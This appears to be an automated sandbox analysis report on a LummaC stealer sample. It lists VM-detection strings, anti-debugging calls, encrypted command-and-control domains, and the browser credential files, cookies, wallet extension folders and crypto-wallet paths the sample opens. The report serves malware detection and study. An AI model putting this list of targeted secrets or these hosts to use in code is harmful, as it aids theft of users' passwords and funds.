Source: 628E.tmp.exe, 00000003.00000003.1643742176.0000000002E5B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: J18zxRjOes.exe, 00000000.00000002.3948229777.000000000073F000.00000004.00000020.00020000.00000000.sdmp, J18zxRjOes.exe, 00000000.00000003.3810812443.000000000073F000.00000004.00000020.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000002.1730668845.0000000000500000.00000004.00000020.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1629782890.0000000000500000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 628E.tmp.exe, 00000003.00000002.1730668845.00000000004BA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWhQP%SystemRoot%\system32\mswsock.dll\
Source: Amcache.hve.7.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: 628E.tmp.exe, 00000003.00000003.1643742176.0000000002E5B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: Amcache.hve.7.dr	Binary or memory string: vmci.sys
Source: 628E.tmp.exe, 00000003.00000003.1643742176.0000000002E5B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: 628E.tmp.exe, 00000003.00000003.1643742176.0000000002E5B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: 628E.tmp.exe, 00000003.00000003.1643742176.0000000002E5B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696494690
Source: Amcache.hve.7.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.7.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.7.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.7.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: 628E.tmp.exe, 00000003.00000003.1643742176.0000000002E5B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: Amcache.hve.7.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.7.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.7.dr	Binary or memory string: VMware VMCI Bus Device
Source: 628E.tmp.exe, 00000003.00000003.1643742176.0000000002E5B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: 628E.tmp.exe, 00000003.00000003.1643742176.0000000002E5B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.7.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: 628E.tmp.exe, 00000003.00000003.1643742176.0000000002E5B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: 628E.tmp.exe, 00000003.00000003.1643742176.0000000002E5B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: 628E.tmp.exe, 00000003.00000003.1643742176.0000000002E5B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: 628E.tmp.exe, 00000003.00000003.1643742176.0000000002E5B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: 628E.tmp.exe, 00000003.00000003.1643742176.0000000002E5B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE
Source: Amcache.hve.7.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: 628E.tmp.exe, 00000003.00000003.1643742176.0000000002E5B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696494690f
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual USB Mouse
Source: 628E.tmp.exe, 00000003.00000003.1643742176.0000000002E5B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: Amcache.hve.7.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.7.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.7.dr	Binary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
Source: 628E.tmp.exe, 00000003.00000003.1643742176.0000000002E5B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: 628E.tmp.exe, 00000003.00000003.1643742176.0000000002E5B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: Amcache.hve.7.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.7.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.7.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: 628E.tmp.exe, 00000003.00000003.1643742176.0000000002E5B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: Amcache.hve.7.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: 628E.tmp.exe, 00000003.00000003.1643742176.0000000002E5B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: 628E.tmp.exe, 00000003.00000003.1643742176.0000000002E5B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: 628E.tmp.exe, 00000003.00000003.1643742176.0000000002E5B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: Amcache.hve.7.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: 628E.tmp.exe, 00000003.00000003.1643742176.0000000002E5B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: Amcache.hve.7.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: 628E.tmp.exe, 00000003.00000003.1643742176.0000000002E5B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: 628E.tmp.exe, 00000003.00000003.1643742176.0000000002E5B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: Amcache.hve.7.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.7.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: 628E.tmp.exe, 00000003.00000003.1643742176.0000000002E5B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: Amcache.hve.7.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom

Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe

API call chain: ExitProcess graph end node

graph_3-27425

Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe

Code function: 3_2_00442080 LdrInitializeThunk,

3_2_00442080

Source: C:\Users\user\Desktop\J18zxRjOes.exe

Code function: 0_2_0042A3D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0042A3D3

Source: C:\Users\user\Desktop\J18zxRjOes.exe

Code function: 0_2_0041EC5E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0041EC5E

Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_0042FE5F mov eax, dword ptr fs:[00000030h]	0_2_0042FE5F
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_005F0083 push dword ptr fs:[00000030h]	0_2_005F0083
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_006600C6 mov eax, dword ptr fs:[00000030h]	0_2_006600C6
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_0063092B mov eax, dword ptr fs:[00000030h]	0_2_0063092B
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_00630D90 mov eax, dword ptr fs:[00000030h]	0_2_00630D90
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_020A0083 push dword ptr fs:[00000030h]	3_2_020A0083
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_020D092B mov eax, dword ptr fs:[00000030h]	3_2_020D092B
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_020D0D90 mov eax, dword ptr fs:[00000030h]	3_2_020D0D90

Source: C:\Users\user\Desktop\J18zxRjOes.exe

Code function: 0_2_0043BBC1 GetProcessHeap,

0_2_0043BBC1

Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_0042A3D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0042A3D3
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_004104D3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_004104D3
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_00410666 SetUnhandledExceptionFilter,	0_2_00410666
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_0040F911 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0040F911
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_0065A63A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0065A63A
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_0064073A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0064073A
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_006408CD SetUnhandledExceptionFilter,	0_2_006408CD
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_0063FB78 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0063FB78

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: 628E.tmp.exe	String found in binary or memory: cloudewahsj.shop
Source: 628E.tmp.exe	String found in binary or memory: rabidcowse.shop
Source: 628E.tmp.exe	String found in binary or memory: noisycuttej.shop
Source: 628E.tmp.exe	String found in binary or memory: tirepublicerj.shop
Source: 628E.tmp.exe	String found in binary or memory: framekgirus.shop
Source: 628E.tmp.exe	String found in binary or memory: wholersorie.shop
Source: 628E.tmp.exe	String found in binary or memory: abruptyopsn.shop
Source: 628E.tmp.exe	String found in binary or memory: nearycrepso.shop

Source: C:\Users\user\Desktop\J18zxRjOes.exe

Process created: C:\Users\user\AppData\Local\Temp\628E.tmp.exe "C:\Users\user\AppData\Local\Temp\628E.tmp.exe"

Jump to behavior

Source: C:\Users\user\Desktop\J18zxRjOes.exe

Code function: 0_2_0041077B cpuid

0_2_0041077B

Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_0043B00A
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: GetLocaleInfoW,	0_2_004351C0
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: EnumSystemLocalesW,	0_2_0043B2CD
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: EnumSystemLocalesW,	0_2_0043B282
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: EnumSystemLocalesW,	0_2_0043B368
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_0043B3F5
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: GetLocaleInfoW,	0_2_0043B645
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_0043B76E
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: GetLocaleInfoW,	0_2_0043B875
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_0043B942
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: EnumSystemLocalesW,	0_2_00434DCD
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: EnumSystemLocalesW,	0_2_00665034
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_0066B271
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: GetLocaleInfoW,	0_2_00665427
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: EnumSystemLocalesW,	0_2_0066B4E9
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: EnumSystemLocalesW,	0_2_0066B534
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: EnumSystemLocalesW,	0_2_0066B5CF
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: GetLocaleInfoW,	0_2_0066B8A3
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: GetLocaleInfoW,	0_2_0066B8AC
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_0066B9D5
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: GetLocaleInfoW,	0_2_0066BADC
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_0066BBA9

Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\J18zxRjOes.exe

Code function: 0_2_004103CD GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_004103CD

Source: C:\Users\user\Desktop\J18zxRjOes.exe

Code function: 0_2_004163EA GetVersionExW,Concurrency::details::platform::InitializeSystemFunctionPointers,Concurrency::details::WinRT::Initialize,__CxxThrowException@8,

0_2_004163EA

Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.7.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: 628E.tmp.exe PID: 1036, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: 628E.tmp.exe, 00000003.00000002.1730668845.0000000000500000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Electrum\wallets
Source: 628E.tmp.exe, 00000003.00000002.1730668845.0000000000500000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\ElectronCash\wallets
Source: 628E.tmp.exe, 00000003.00000002.1730668845.00000000004CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Jaxx Libertyn]
Source: 628E.tmp.exe, 00000003.00000002.1730668845.0000000000500000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: 628E.tmp.exe, 00000003.00000002.1730668845.0000000000500000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: 628E.tmp.exe, 00000003.00000002.1730668845.0000000000500000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: 628E.tmp.exe, 00000003.00000002.1730668845.0000000000500000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: 628E.tmp.exe, 00000003.00000002.1730668845.00000000004BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: 628E.tmp.exe, 00000003.00000002.1730668845.000000000054A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.json	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
